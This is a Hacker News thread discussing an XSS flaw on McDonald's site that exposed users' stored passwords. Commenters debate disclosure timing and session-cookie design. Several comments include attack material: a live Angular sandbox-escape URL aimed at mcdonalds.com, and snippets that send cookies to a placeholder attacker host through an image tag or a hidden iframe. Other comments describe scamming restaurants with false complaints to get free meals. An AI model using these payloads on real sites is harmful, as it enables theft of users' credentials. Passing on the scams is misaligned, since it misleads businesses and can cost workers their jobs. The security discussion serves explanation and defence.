Stealing passwords from McDonald's users (finnwea.com)
544 points by chx 247 days ago | 164 comments



The author of the article removed the disclosure timeline before this was posted to HN.

The disclosure window was only around 5 business days before the author posted this article. Extremely unprofessional and irresponsible.

EDIT: Original timeline can be found at https://web.archive.org/web/20170116061303/https://finnwea.c...

    24 Dec 2016 17:27:56 GMT	Reported the vulnerability to McDonald's via Twitter multiple times (no response).
    28 Dec 2016 21:28:39 GMT	Reported the vulnerability to McDonald's NL via mcdonalds.nl (they couldn't help).
    28 Dec 2016 21:36:12 GMT	Requested disclosure assistance on HackerOne (no response).
    30 Dec 2016 13:04:32 GMT	Reported the vulnerability to McDonald's via phone (they would contact me ASAP).
    05 Jan 2017 23:31:42 GMT	Public disclosure.


It was 12 days from his first attempt.

It sounds like he had some trouble reporting it. It looks like he never received a call back, so he decided to release it to the public. The timeline reads like he did it out of spite.

It would be frustrating to do all of this free, highly specialized work and not find someone who cares at McDonald's.

But I'd at least give it a bit more time. Especially considering his first attempt at contact was around Christmas...


I've worked with the McDonald's web team before. They do care about performance and security. I reverse engineered an undocumented (to them) protocol for a game system in order to write tests for it--which was really, super fun to watch run.

McDonald's uses 3rd parties for most of their main development work. In the case above, the developers were in Australia, while McDonald's is in US Central Time and I was in US Eastern time. When I reported problems and provided suggestions, they usually had a conference call with McDonald's, the Aussie devs, and my team within 12 hours. If it was a weekend, it was Monday night. McDonald's core team takes this very seriously.

The difference here was that I had all the right phone numbers and am known to them. I was working for a well-known, publicly traded company, which carried weight by itself. If I hadn't had the right contacts, hadn't been to their HQ and met with the VP of IT and Director of Online, I don't know whether they would have taken what I said seriously.

Secondly, this was the US Christmas and New Year's holidays. They were running a skeleton crew. As Adrian Cockcroft, former lead cloud architect at Netflix, once said, the time Netflix is the most stable is Christmas and New Year's because there aren't any engineers around.

With all that, they need to take this as a wake-up call and have a security response system, even if they contract a 3rd party for that also. There must exist, or this is a nifty startup idea, 3rd party firms that go through security@company.com emails, including the reams of spam, and there should be an optionally anonymous security problem reporting form with a captcha to get information such as this to the right people.

Lastly, 12 days is extremely short under any circumstance. While I'll admit that it can be extremely frustrating to not get a response, I believe 30 days should be the minimum between first notification and publication of details. If a security firm wants PR for finding the problem, then post that there IS a problem first, and wait the full 30 days from the initial contact attempt before disclosing the details.

--Donald


>> It would be frustrating to go through all of this free highly specialized work

Give me a break. He didn't perform "free highly specialized work". If only I could walk uninvited into any business of my choosing, do whatever work I feel like doing without being hired - or even talking to someone first - and then demand attention, recognition, and/or payment.

Anyone who releases security vulnerabilities to the public without acknowledgement from the company is an unprofessional parasite on society. Even more so with less than a month between discovery and public release.

I hate conglomerates, but if McD's has an avenue to sue for damages, I wouldn't bat an eye out of sympathy.


Not the author, but it was absolutely, definitely not removed before this article appeared on HN. It may have been removed afterwards, but when I read this article last night that timeline was there. It was even discussed elsewhere in this thread.

No comment on the timeline itself.


>Extremely unprofessional and irresponsible.

Agreed, especially considering the timing over the Christmas and New Year's holidays; they probably couldn't get word down to their engineering team.


> >Extremely unprofessional and irresponsible.

> Agreed

How ungrateful. Someone puts in free work to make the world safer by fixing someone else's problems and they're a jerk because they didn't pamper them enough in the process.

> considering the timing with Christmas and New Years holidays, they probably could not get the word down to their engineering team.

Then this serves as notice that they need to be able to, in about 15 minutes, 365 days a year. Reality calling. FWIW, fixing a problem like this is almost always trivial: not making the product bulletproof, but simply disabling logins or whatever is needed to keep it from being exploited until it can actually be fixed.

A change of mindset (and stopping blaming the researchers) is all it takes to go from a many-month patch cycle to shipping mitigations inside of 12h.

Can you imagine a real engineer complaining about warnings, for instance that their bridge supports were crumbling, because the discoverer didn't go through the proper reporting process?


> Can you imagine a real engineer complaining about warnings, for instance that their bridge supports were crumbling, because the discoverer didn't go through the proper reporting process?

In your example the engineer should then proceed to blow up the bridge all while road users are still on it.


I imagine they'd block it off and not let anyone drive on it.

Or you know, murder. Maybe you're right.


What are your thoughts on what a professional and responsible disclosure time is?


Google, in their post "Disclosure timeline for vulnerabilities under active attack,"[0] state a 60-day disclosure deadline for ordinary discovered security vulnerabilities and seven days for critical, in-the-wild security bugs under active exploit.

[0] https://security.googleblog.com/2013/05/disclosure-timeline-...


Much more than 12 days. Below is a copy/paste of a recent security vulnerability timeline:

2015-12-14 | me > dotCMS | 8 SQL injection vulnerabilities

2015-12-14 | dotCMS > me | they were planning fixes in upcoming release, estimated to beginning of 2016

2016-03-16 | dotCMS | dotCMS version 3.3.1 release (CVE-2016-4040 still not fixed)

2016-04-07 | me > dotCMS | what is the situation with reported vulnerabilities?

2016-04-07 | dotCMS > me | CVE-2016-4040 will be fixed in 3.5, which is estimated to be out in mid-April

2016-04-19 | dotCMS | dotCMS version 3.5 release

2016-05-10 | dotCMS | dotCMS version 3.3.2 release

2016-10-31 | me | Full Disclosure on http://security.elarlang.eu

Source: http://seclists.org/fulldisclosure/2016/Nov/0

This timeline from first report to full disclosure was 10.5 months. Note that I did not go looking for a long timeline, this was the first item when I Googled "CVE disclosure timeline."

--Donald


Yeah, and it's absolutely uncorrelated to what the company feels comfortable with.

Maybe 24h? If you can't respond and mitigate within that time frame you aren't operating on internet time.

> From policy quote in sibling post: "[...] currently known in-the-wild security bugs under active exploit."

Nonsense. Every bug you discover could have been discovered by an attacker, and attackers are constantly scanning. If the bug is in release software you have to assume it's known and being exploited.

btw, for the downvoters - I know I speak the truth because I've worked dev in an internet-security company, and in security in a major cloud company. We can turn patches (or mitigations) around in hours and have them canaried and live within 24h. This is absolutely doable and should be expected. The months-long nonsense happens when the company doesn't want to fix the bug.

What it takes is the institutional will to disable a feature you bill for until you secure it. When a $millions/day loss is on the table, you find that obstacles evaporate. If a company keeps its vulnerabilities under wraps, there's no such cost, and thus no will to fix them, in an ever-worsening spiral.


This seems to be a common practice, storing UserIDs, Usernames, etc. in cookies rather than a unique SessionID that can be used to look those things up (and will expire). I'm curious as to where people are getting the idea to build things that way.

Because it never would have occurred to me to do so. Or rather, had it occurred, it would have immediately raised the question of "what happens when the user monkeys with their cookie". Surely everybody else thinks the same way.

If so, how do we end up with this? Are there really "Teach yourself in 21 Days" books that have examples with this pattern that people are following?

Or does everybody just assume that they're going to be Facebook with 4000 servers and no way to quickly generate or store or manage or look up those keys for millions of simultaneous users, and that it's worth the tradeoff?


A couple of rambling thoughts on how we get here:

1. Lack of experience. Most web devs I've met have never even heard of using expiring session tokens in a cookie. (imho) It's been my experience that most JavaScript devs can be relatively young, as it's the new teaching language (sorry, Python). They spend most of their time learning react/redux/mobx/angular2/vue and just haven't been exposed to security practices like expiring session tokens in a cookie. It's not their fault; we don't know what we don't know. Not realizing that this practice has been around for almost 20 years, the developer invented a new way of logging in using cookies.

2. Most people don't take security seriously. I recently had a conversation with a dev who was being a cool kid by using JWT bearer tokens. He was putting admin=true inside the bearer token and signing it. I asked him what would happen if I stole his token. Would I become the admin? The answer appeared to be yes: the software would read the bearer token, inject admin=true into your session, and give you admin rights on the webserver. However, he explained that the JWT's expiration was 1 hour. "So if I steal and use your token, I only have 1 hour to be admin on your site?", I asked. Apparently he felt that was good enough.

3. Security is expected to be provided by the framework. XSS, CSRF, SQL injection - don't worry we're using Django. That seems to be the expectation of most people. You don't need to know about security, because the framework handles that. The problem is that this only gets you so far, there are things that live outside of the scope of the framework that you probably should know about, but don't. (I guess storing the user's password in a cookie would be one of those)


I don't see how number two is a security issue. Maybe I'm misunderstanding or maybe I'm ignorant. If I steal an admin's session token, it follows that I get to be an admin. How does a JWT with admin=true exacerbate this issue, or how would any other type of session token mitigate it?


Well, the comment you're replying to only described the issue as "being a cool kid by using JWT bearer tokens", which isn't enough information to accurately describe what's happening. One can only guess...

A JWT is just a base64 encoded JSON object that has a signature. You can pass one to any base64decode() function to see the actual data, so the important part is checking the signature to see whether it's been tampered with.
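
To make that concrete, here's a minimal sketch (the token and its claims are made up) showing that anyone holding a JWT can read its payload without knowing the signing key:

```javascript
// A JWT is header.payload.signature, each part base64url-encoded.
// Reading the payload requires no secret at all.
const claims = { admin: true, user: "alice" }; // made-up claims
const token = [
  Buffer.from(JSON.stringify({ alg: "HS256", typ: "JWT" })).toString("base64url"),
  Buffer.from(JSON.stringify(claims)).toString("base64url"),
  "fake-signature" // irrelevant when merely reading the data
].join(".");

// What any client (or attacker) can do with a captured token:
const decoded = JSON.parse(
  Buffer.from(token.split(".")[1], "base64url").toString("utf8")
);
console.log(decoded.admin); // true
```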

But the whole "admin=true" part, while it doesn't sound like best practice, isn't inherently less secure than using the JWT notation for scopes. "admin=true" might as well be "scope=admin" so the person criticizing the "cool kid" doesn't seem to understand JWT usage themselves.

What's important is where you sign and verify a JWT: Signing means using a secret key, which means actually having a secret key stored, which means that it has to happen server-side.

Proper JWT usage means that both the data creation/signing and data reading/verifying are always happening on the server, and you've got to trust the security of your servers, since they have the ability to read your shared secret key.

So to be secure, you shouldn't really send the JWT to an insecure client like a web browser at all. Since anyone can read a JWT, you're unnecessarily leaking information about the inner workings of the app, just giving hackers important info like the variable names you're checking for.

Instead, the best move is to use key/value storage for hashing your JWT into garbage and sending that over to the browser. When the user performs an action, they'll send the nonsense key and the server will retrieve the actual JWT and verify/perform the actual request handling.

Of course, this just takes the conversation back to session handling. There are various ways to mitigate the risk of someone stealing another user's session data and using it to impersonate the user, but those aren't unique to JWT.

Anyway, the comment above doesn't give enough detail about what the "cool kid" was doing in order to determine whether it was bad security or not. Sounds like either a lazy description of the actual scenario, or a poor understanding of JWTs.


It is an extra vuln. if the JWT only has the role=admin K/V, and no expiration value.

A jwt that is only valid for a certain time is no less secure than a session id, as long as you verify the signature correctly.


Curious about #2. JWTs are signed via a secret key, right? Couldn't the backend verify the signature and reject the token? I'm pretty confident most JWT implementations do that automatically.

The dude just didn't think about that or look into how JWTs work, which I believe is even worse :&lt;


I think you're thinking of a different attack vector, namely, forging a new JWT.

Whereas the parent poster said "what would happen if I stole his token" (for example, via XSS). So in that case, it's a legit token in the hands of a bad actor, and the signature would still be valid as far as the backend could tell.


Your #2 explanation is vague. Are you saying that the system had no server-side storage of whether a given user had admin rights or not?

In #1 you mention "security practices like expiring session tokens in cookie" and then go on in #2 to say that the exact same thing isn't good enough. You do know that the T in JWT stands for "token", right?

Are you sending raw JWTs straight to the browser? Why? That's the big problem, not setting "admin=true" inside of a JWT. The data in a JWT is a claim that's meant to be verified by signing. It's no more and no less.

If you want to describe the OAuth implementation or something more substantial than a "cool kid" then it might be more illuminating, but you don't give any context.


>It's been my experience that most javascript guys can be relatively young

I really don't understand how these people make it through the magic 'must have 5 years experience' marker and just don't know proper security practices. It seems like people just lie on that.


They lie because the constraint is a lie. The years of experience requirement is entirely made up by a lazy hiring manager, and is just a poor proxy for "has this person tried and failed and learned enough from their mistakes to make well-reasoned decisions about future things without my constant oversight and input."


About #3: storing user authentication is one of the best examples¹ of things you should rely on your framework for. It's not as simple as it looks, what is considered "safe" changes suddenly, and it is very standardized.

And it's well within the scope of Django.

The blame is almost completely in #1 and #2.

1 - And, yes, protection against XSS, CSRF, and SQL injection are other great examples.


>> Are there really "Teach yourself in 21 Days" books that have examples with this pattern that people are following?

Yes. From Learning PHP, MySQL, Javascript, CSS & HTML5, Third Edition, from O'Reilly publishing:

So, to create a cookie with the name username and the value Hannah that is accessible across the entire web server on the current domain, and will be removed from the browser’s cache in seven days, use the following:

    setcookie('username', 'Hannah', time() + 60 * 60 * 24 * 7, '/');
And that was published in 2014, not 2004.


A username is different from a password. There can often be legitimate or at least semi-legitimate reasons to do this.

I dunno everyone has to learn how to use cookies if they are building web apps.

Password is obviously just bad.


Everyone, really?

I've been building webapps since forever, and I've never used cookies directly in JavaScript like that; I can't personally think of a use case where I would.

I've only used cookies that store a session id and I store everything in the session. The session id cookies are handled entirely by the servlet container.

I don't believe I'm doing it horribly wrong.


What you stated is pretty normal-seeming to me, so no, not "everyone". But I think web developers still need to know what a cookie is and how to use one, even if you don't use them often. They can provide a better user experience by remembering some aspects of a user or their session long after it has expired. Many sites have semi-authenticated states where you may not want to hold user data, but still want to remember some details about their session.


User IDs and usernames are generally public information, so I do not see the problem with storing them in a cookie, as long as you authenticate it (e.g. using a MAC, and you might want to include a timestamp and a version number). It does however sacrifice server-side control of sessions.


To answer your question about monkeying: Sign the cookie! We sign session cookies with HMAC, and reset the session if it doesn't match. Doesn't handle replay attacks, but you at least know that you're getting back the same data that you gave the client.


Doesn't handle replay attacks...

This is why we have CSRF tokens, right? Orthogonal to session cookies, but when used together they avoid this vuln.


Does signing the cookie with secondary information such as IP or UA help? I know they can both be spoofed, but it's an extra layer...


Signing the cookie with IP would break the site for everyone with changing IPs, e.g. mobile users on cellular networks. Web site sessions should persist across IPs.


We were doing that previously in our homegrown framework. The session would include an ID, username, and an expiration timestamp, along with a salted hash of that data to confirm it. We've since moved away from it (and the entire homegrown framework, actually) because we realized it didn't make anything easier, but we never had an issue with that data being in the session (it was all publicly available regardless).

In the end, though, it is probably best to err on the safe side and only expose a salted, hashed session ID via cookies, then do a server-side lookup to get the necessary data (which you would need to do regardless).


It seems we revisit this topic or a branch of it often enough that it's almost becoming a meme.

Here is a 2-page, 7.4K security checklist. If you verify and check each box, your application won't be bulletproof (it is software, and you have 3rd-party libraries), but it will be close to airtight. --Disclaimer: I have nothing to do with this security checklist or its authors, except appreciation and respect.

Security Guide For Developers - Latest: https://github.com/FallibleInc/security-guide-for-developers...

--Donald


It's literally used on hundreds of websites. I'm sure there is a developer out there right now going "How does McDonald's do this?"


I don't think everyone assumes they're going to be Facebook, but they probably do assume (correctly or not) that scaling session management up is painful, and they're doing their best to avoid it.

Consider it a teaching moment and show folks how simple it is to store all your session-like stuff in cookies, along with a timeout and a version hashed with the server's secret.


It's something I've steered away from, or I would encrypt the ID before saving it in the session. I don't exactly recall where I picked it up, but I know I've seen it in example tutorials in books on Rails apps.


FWIW, all session information (`session[:user_id]`) is stored in an encrypted cookie starting with Rails 4.


Before reading, I thought this was about stealing information over public WiFi. After reading, I realize it's about the McDonald's website; but why do people need a password for their website?


You can register your family to a McD account, and your kids below 12 get free meal coupons on their birthdays. Someone I know maintains 4 imaginary kids on his family account and collects 4 free meals a year. :)


"Hi, I would like to collect these free meals for my totally legit kids, Little Bobby Tables, Asdf, Hunter123 and Admin."


Can't believe how much ; DROP TABLE "NAME"; has grown!


Thank you for the morning giggle :)


'Say hi to 'alert(1)' if you please!'


Nitpick: It's hunter2 not hunter123.

For anyone unfamiliar:

http://knowyourmeme.com/memes/hunter2


Presumably you knew he got it wrong because it wasn't *'d out for you?


Oh, never mind NULL.


That person you know thinks they're gaming the system, but McDonald's is the winner. They're keeping the customer hooked.


"Someone I know"


That is hilarious.

I remember when I moved to a new apartment once, two of my friends told me how to get free meals. Every time they moved, they wrote several restaurants about their terrible experience, how the staff was unprofessional and how embarrassed they were bringing their relatives there. They'd get like 15 free meal vouchers for Chili's, O'Charley's, Red Lobster, etc.


That's a real asshole move if you ask me. Blaming others for something they haven't done just to get some free meals.


You know that someone might get fired, right?


The use of "free" here externalizes the cost of the time it takes to write or call restaurants, which could be potentially used for more rewarding activities. And assuming that the person is not a sociopath, it also externalizes the burden of introducing a new internal dialogue that tells you that you're acting unethically.


Why would you do this when moving in particular?


Well, you can basically do it once with the restaurants in your new neighborhood. Otherwise it would probably ring the alarm bells for someone if the same guys are complaining and receiving vouchers multiple times. Anyway, it's a scam.


Why do you have to be near any of these restaurants to do this? I assume these are chains and the vouchers are valid at any franchise. Just spam complaints from different e-mails and never pay for food.

Seems like such an obvious scam there must be some reason it can't work.


For the mobile app.


They also have contests like Monopoly.


Neither of you answered the question:

> why do people need a password for their website?

Why does the mobile app need a password for the website? (Why does McD's need a mobile app?) Why does Monopoly need a password?

It worked just fine back in the days before there were mobile apps; peeling a sticker off fries doesn't require a mobile app. Heck, Coke was more fun back then because you could win a free coke or stuff. Now I'll never win a free anything, because I'll never sign up for every asinine website.

My data is either being sold, or stockpiled into a database that's waiting to be hacked.


Don't know why McD's has a mobile app, but Chick-fil-A has an awesome one that lets you place an order remotely, drive into the designated parking spot, press a button, and get the food run out to your vehicle. It's a lot of fun.


I saw this movie... I think it was called "Wall-E"?


Hehe. For what it's worth, the bugs aren't all worked out yet so you do have to walk into the building a lot to get your food. :P They also have it for dine-in customers.


Is Maccy's monopoly all digital now in the states or something?

Across the pond, we still get the little stickers and the fold out 'boards' to stick them on.

On a related note, I cleared out the zipper part of the notes section of my wallet the other day, mostly old receipts and bus tickets - but I also found a bunch of expired monopoly stickers from last year, 4 free apple pies, 2 free drinks, 1 free hot drink, 2 free cheeseburgers and 1 free fries.

Someone remind me to never put things away 'safely' when they have a use-by date on them...


You still get the physical pieces but they all have unique redemption codes printed on them. I assume if you win anything besides a free drink, they make you input the redemption codes to prevent counterfeiting.


Last time I checked, it was for the press, to get PRs before they're public (during the embargo period).


McD's has embargoed press releases? …about… what?


Yeah. Beats me too. What would a publicly traded firm with 30k+ restaurants and half a million employees worldwide be doing with a professional PR operation?


Maybe for delivery? I believe some McDonalds deliver, right?


They do here in Japan. But I am unsure if there is a login (from most examples I see here, I would assume there is, though).


God, you live in Japan _and_ you have McDonalds delivery. I am seriously jealous right now!


I've heard delivered Maccy's isn't very good (mind, this was in Singapore, not Japan) - the food always arrives cold, sweaty and just generally gross.


I know that over-the-counter Mackas isn't very good. It's cold, soggy, and generally going to disappoint.


It's fine in Singapore, and they're always happy to replace an unsatisfactory order.


McDonald's delivers in NYC. They're even on Seamless.


Looking into the future here:

Amazon will surely deliver :D (pun intended)


24hours McDelivery in Hong Kong!


They do in Malaysia(!)


Never mind why people need a password; why does McDonald's even need to have a website of any kind in the first place?


Menus, Nutritional info, contact details, location map, franchise info, competitions, complaints, job listings and probably more.

(I've not actually checked the site to see if any of these are actually there, but.. these would be valid for nearly any fast food chain)


Pardon my ignorance, but how are the passwords actually stolen?

If I understand correctly, this exploit lets you execute arbitrary code on the search results page. And in this case, the code will load up an iframe from a separate place in McD's domain, get the 'penc' cookie and decrypt your own password.

So you would still need to send a link to a registered McDonald's user who had clicked "Remember Password", and then presumably send their decrypted password to your own servers (how?). And also somehow steal their username/email.

Is that correct?


> Is that correct?

Yes, that's the classic XSS attack pattern. It's like phishing, but better since you're sending the person a link to the actual website. And once they've clicked on it, they're already screwed; they don't even need to manually enter any information.

> how?

Once you have the cookie, it's as simple as making an XMLHttpRequest to your own server that includes the decrypted email and password from the cookies.


If they don't set X-Frame-Options, the attacker can also just use a 1x1 iframe on a popular website or a shady ad network to trigger that page to load.


It's pretty simple to exfiltrate data from the JavaScript sandbox once it has been compromised via XSS. The simplest way is probably appending an img tag to the page's DOM, with a src pointing to a server you control and send the user's password as the image name.
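
For illustration, the injected script might look roughly like this (attacker.example is a placeholder; the DOM part only runs in a browser):

```javascript
// Build the beacon URL that smuggles the cookie out as a query string.
function exfilUrl(cookie) {
  return "https://attacker.example/log?c=" + encodeURIComponent(cookie);
}

// In a browser, the XSS payload then appends the image; merely setting
// src makes the request fire, so the attacker's server logs the cookie.
if (typeof document !== "undefined") {
  const img = document.createElement("img");
  img.src = exfilUrl(document.cookie);
  document.body.appendChild(img);
}
```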


They still haven't fixed it. I'm only getting it to work in Chrome though, seems like the Angular sandbox escape doesn't work in Firefox. See for yourself (I'm only posting the more harmless alert demo, but the others work too):

  https://www.mcdonalds.com/us/en-us/search-results.html?q=%20{{x%20%3D%20{'y':''.constructor.prototype};%20x['y'].charAt%3D[].join;$eval('x%3Dalert(1)');}}
Then again, I wouldn't expect them to fix it very fast, considering how abysmal it is to basically store a user's password in a cookie in the first place.


> I tried decrypting my password on the search page using a malicious search payload, but it didn't work. Somehow, the cookies contain hidden characters on the search page causing the getCookie method to fail. The getCookie method tries to trim whitespaces from cookie values. In the images below you can see .charAt(0) returns a strange string when executed on the search page.

Note that the author doesn't seem to have checked what the sandbox escape itself does: it redefines the charAt function to be Array.join, so of course it produces garbage!
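
That garbling is easy to reproduce: Array.prototype.join called on a string treats it as an array-like of characters and uses the argument as the separator:

```javascript
// After the payload does ''.constructor.prototype.charAt = [].join,
// "abc".charAt(0) is really Array.prototype.join.call("abc", 0):
const result = Array.prototype.join.call("abc", 0);
console.log(result); // "a0b0c" -- not the "a" that getCookie expected
```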


Probably unlikely that McDonalds built that themselves. I would guess they contracted it out. It's been a long time since I knew anyone in their in-house IT division but it was entirely back office stuff not public facing.


They own the company that develops their software[1] as far as I know. It's a subsidiary.

[1]: This company: https://www.rdisoftware.com/


They only work on POS & POS data related applications for McDonald's. They were purchased because of this fact.


True. Very likely an interactive creative agency built the app.

In-house IT typically controls the DNS 'A' record and reviews/oversees deployment of provided assets.


Given this grammatical error:

> "Do you want to search <query> in news section?"

I'd guess it was built by an Eastern European agency.


The biggest problem here is their architectural design: they're mixing server-side code with the front end. They're printing Angular-interpreted markup from the back end, but they're not filtering {} characters. Basically, a user can execute arbitrary Angular expressions, and therefore arbitrary JavaScript.


Yeah, this problem is basically unsolvable if you wish to have { characters anywhere in your page from server-side rendering.

- Have the possibility of {{ and }} in your server-side output (or whatever symbols you configured Angular for)

- Have Angular.JS on a page with server-side output

Choose one.

It's important to realize that this affects things like user input as well. So form initials/form defaults can also be affected by this issue!

A bit of a silly way to fix this problem is to modify your server-side escaping function (surely you have this!) to "escape" {{ with {<zero-width space>{. This will mess up things that need to be equal to each other, and can poison user input (because of form initials) but will protect you from this issue.
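
As a sketch, that escaping step (assuming Angular's default {{ }} delimiters) could be as simple as:

```javascript
// Defuse Angular interpolation by splitting "{{" with a zero-width
// space (U+200B): invisible to the reader, but Angular no longer
// sees an opening "{{" in the server-rendered output.
function defuseInterpolation(s) {
  return s.replace(/\{\{/g, "{\u200B{");
}
```

As the parent notes, the zero-width space survives round trips (e.g. form defaults), so this is a stopgap mitigation rather than a fix.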


If you're displaying user input, you could just encode the braces to their matching HTML entities...

&#123; or the human-friendlier &lcub;


That doesn't work, because HTML entity decoding happens before Angular scans the DOM for the brackets. So even if the server outputs &lcub;, Angular will still interpret the brackets "properly".

As to why this works this way, consider the following:

Do you have to HTML-entity-decode an input's value when reading it from JavaScript? No, because the browser has already decoded it; and Angular reads the same decoded DOM.


Correct me if I'm wrong but it appears they are now filtering the {} characters by URI encoding them upon submitting a search.

This isn't to say they've fixed anything else yet (I haven't looked), but it may mitigate the efforts of the lazy (like me in this instance).


There was no filtering last time I checked. Now it looks like they've fixed the problem by deleting the search results page entirely; it's returning 404 :)


Their mobile application does or did send their Google GCM API keys to the client, along with a bunch of other bizarre server configuration information. I had no way to report it; I tried sending an email to their WHOIS contact to no avail.

If anyone has successfully reported a vulnerability to them, let me know!


GCM keys means you can send notifications to other users of the app?


So the attack vector here is to send someone a link to the search results page with a malicious query that injects JS into the page to decode the user's password and then submit it to the attacker's backend collection server? Is that right?


No. A more effective vector would be to send them to a funny video page to watch, that has nothing to do with McDonalds. And inside that video page you have a hidden iframe pointing to the malicious query which submits the McDonald's password to another backend server.
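For illustration only, a sketch of that vector; the URL, query parameter, exfiltration endpoint, and payload are all made up, and the payload depends on the Angular version:

```javascript
// Build the malicious search URL; the {{...}} payload runs inside the
// target origin when the vulnerable page loads it.
function buildAttackUrl(payload) {
  return 'https://www.mcdonalds.com/search?q=' + encodeURIComponent(payload);
}

const payload =
  "{{constructor.constructor('new Image().src=" +
  "\"https://attacker.example/c?p=\"+document.cookie')()}}";

// On the decoy "funny video" page, the URL would go into a hidden iframe:
if (typeof document !== 'undefined') {
  const iframe = document.createElement('iframe');
  iframe.style.display = 'none'; // invisible to the victim
  iframe.src = buildAttackUrl(payload);
  document.body.appendChild(iframe);
}
```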


meh, make a mcdonalds.com search link that generates "Congratulations, you won a free mechanically deboned meat product!!1" and share it on bookface.


That's the basic principle of XSS. A few years ago an XSS epidemic broke out where dozens of major websites were found to be vulnerable to cookie theft. Attackers could make a single page with dozens of sneaky iframes, one per vulnerability. Usually the contents of the cookie allows you to continue a user's session, though there can be all kinds of stuff idiotically stored directly in the cookie, as can be seen in this prime example.


As we close the barn doors after the horses have left, we are left to ponder these two valuable resources for further edification.

[1]https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_...

[2]https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet


   They use the same key and iv for every user
 
What dev sits down, starts writing code, and thinks something like this is a good idea? Not to mention all the other problematic choices.


You ask this question, but it seems like you don't know how the real world works.

In a lot of places, you aren't asked to build a product, especially if your core business isn't technology. You are on a tech team that exists within the structure of a large organization that really doesn't care about technology at all. It's just a thing they want on a checklist.

So you get asked to throw something together to see if people like it. So you do. And you don't in your wildest dreams think that this piece of shit is going to see the light of day. It's just concept.

And then the next thing you know, some assclown decides it's good. Okay great. But you didn't hear about it because the company is the size of McDonalds. Not a small startup with 6 people who all know what they are doing.

So ops and infra get together and deploy this toy shit that you thought was just a joke mostly, and now you have incredible security problems.

That's one way this happens.

There are many others. Reality is a lot more complicated than what you are trying to suggest.


> So you get asked to throw something together to see if people like it. So you do. And you don't in your wildest dreams think that this piece of shit is going to see the light of day. It's just concept.

One of my previous products was a custom failover application for one of our customers. It took a year on and off, with a quick prototype to see if we were on the right track ("yep, looking good!"), a rewrite as a proper application, sending test versions ("yep, we received it!"), and getting replies back ("yep, the new update works!"), after which we declared it done and parked the project.

Then came a feature request. They wanted us to change some text in the program that was annoying one of the operators. Specifically, the text "!! PROTOTYPE VERSION - DO NOT USE !!" in the window title, and the "!!PROTOTYPE VERSION - DO NOT USE!!" text in large letters on the main window. It was also called "PROTOTYPE" in the start menu launcher, but they'd helpfully managed to rename that themselves.

So yeah, they were still using - in production - the initial quick test I bashed together in two days, and some CA on our end or customer representative in the middle was either horribly confused or just faking the project management part all the time.


"Not a small startup with 6 people who all know what they are doing."

Another scenario is a small startup with 6 people who _don't_ know what they are doing, but the auth code has got to get written somehow. By the time the company gets big enough to have major high profile customers the person that wrote the auth code is now in a senior management position, the senior devs don't want to touch the auth code because it "works" and they know better than to break something just because a junior programmer has raised a theoretical issue they only just understand and they've never seen in the real world.

(I may have been that junior programmer. I'm sure there have been more since then.)


Also, that tech team might be in another large organization (not McDonald's), in another part of the world, where any work they do has to be budgeted for, agreed on, spec'd, tested, and released through a tedious process.

Someone might be casually thinking "hmmm this doesn't seem quite right" but there would be a dozen hurdles to jump from that suspicion to getting anything done about it, so they keep quiet and move onto the next project. They might never even know or care if their code went live.


>> budgeted for, agreed on, spec'd, tested, and released through a tedious process

This. You have to spec out even the most simplistic security practices when you send work to a remote team or they won't get implemented.


I heard this happened with an air traffic control monitoring demo after 9/11.


Developers at agencies with extremely tight deadlines. 'Caring' brings no revenue and if it means you miss the deadline, it actually means less revenue.

Thus agency developers tend to implement the bare minimum to show it working. Everything else is chargable later.


- hey dude, what is this "key" parameter?

- IDK, just copy this code from the stackoverflow, it works for me


I would generally assume it's much closer to "code, code, code, cookie[key] = crypt(password), code, code".

Many (most?) crypto libraries have incredibly accident-prone APIs. When presented with both `crypt(input) -> encrypted` and `crypt(input, iv, nonce, secret, etc, wtf, abc | 23 << 2) -> encrypted`, which do you choose?


I like how the page title changes to "Are you still there?" when you switch to a different tab.


Is it legal to publicly post a website security vulnerability? Or in other words, what is the legal process (let say in US) to notify a website/vendor that their app/website is vulnerable, without being accused of hacking?


There is not clear legal structure, but two practices are commonly advertised by white-hat professionals:

- only test your access on your own (test) accounts; as long as they can't prove that you accessed someone else's information, you should be fine. Anecdotally, I have worked for Facebook, where you are not supposed to create fake accounts; on the white-hat page, you can ask for test accounts for that purpose exclusively. Those are entirely independent from the rest of the graph, and you are joyfully encouraged to try to hack yours;

- warn the security team ahead of time and tell them that, without feedback from them, you will publish the information in X weeks. If what you have found is valuable, you should hear back fast; if they do not respond, you can argue that it was their silence that told you this was not their priority (a legally dubious argument, but most of the community will be happy to criticise their silence). You are not bound by their response (some corporations can be very unreasonable), but specifying that you have not hacked any account except a test one should help you if they throw lawyerese at you.

One way to avoid being caught off-guard by those is to have a bounty program, but that’s not in security consultants’ hands.


This is a real cool way to explain XSS in an easy concrete way. Love the thought process and actual code examples.


That disclosure timeline is very aggressive over the holiday period.

Did they ever get in touch with you after the 5th?


Agreed - the timeline is over the most popular period of the year when most 'back office' people (i.e. IT teams, management, and others not involved in direct customer service) are away. The least the OP could have done is waited until mid-January to release to public to allow them time to get some resources onto the problem IMO.


I would be surprised if a company like McDonald's had no emergency crisis procedure to handle issues that could damage its reputation anytime, anywhere, and to recall people even when they are off on holidays. Maybe they thought it was not worth taking seriously.


I agree, but like someone else pointed out on this thread, this was probably a third party agency who built the site. If they had closed shop for the holidays, and everyone at the agency was overseas visiting family etc., then the response would be difficult.

At best, perhaps a programmer could be pulled away from his Christmas pudding to hack a patch remotely on his laptop, or take down the site entirely until they could handle it properly?

Just speaking from my own experience here - I run a small web dev agency, and I know that during the Christmas break, we can only offer rudimentary patch up work for our clients, and that is only depending on the internet connection at wherever our team members are.


Just a reply of "Hi, our IT staff confirms this is a security issue. We intend to fix it as soon as possible. Thank you for your help." doesn't need to wait for the 3rd party agency to come back from holiday.


Edit: Realised I was being dumb here. I get it now.


If you can sniff other users' cookies, you can get their passwords. Good thing no one reuses passwords across sites!


Where the proof-of-concept shows the password in an alert box, a malicious implementation can send it to a remote server. What his proof-of-concept page does, any website can do.


Yeah, the disclosure comes close to violating their own Responsible Disclosure policy, which is 3 business days.

If McDonald's employees get the holidays off and go back to work on the 3rd, they would have had 2 days to respond. Meaning that if McDonald's had disclosed a vulnerability to Finnwea.com over the same time period, finnwea.com says they might have sued them.

So maybe that guy was a little trigger happy. Great hack, though.


I could be wrong but it sounds like your comment is confused about what a business day is. If a firm decides to let some individuals have the whole time off during the holiday period, that doesn't mean those aren't business days from an external perspective.


Yes, because a company at #109 on the Fortune 500 shouldn't bother spending money on 24/7 infosec.

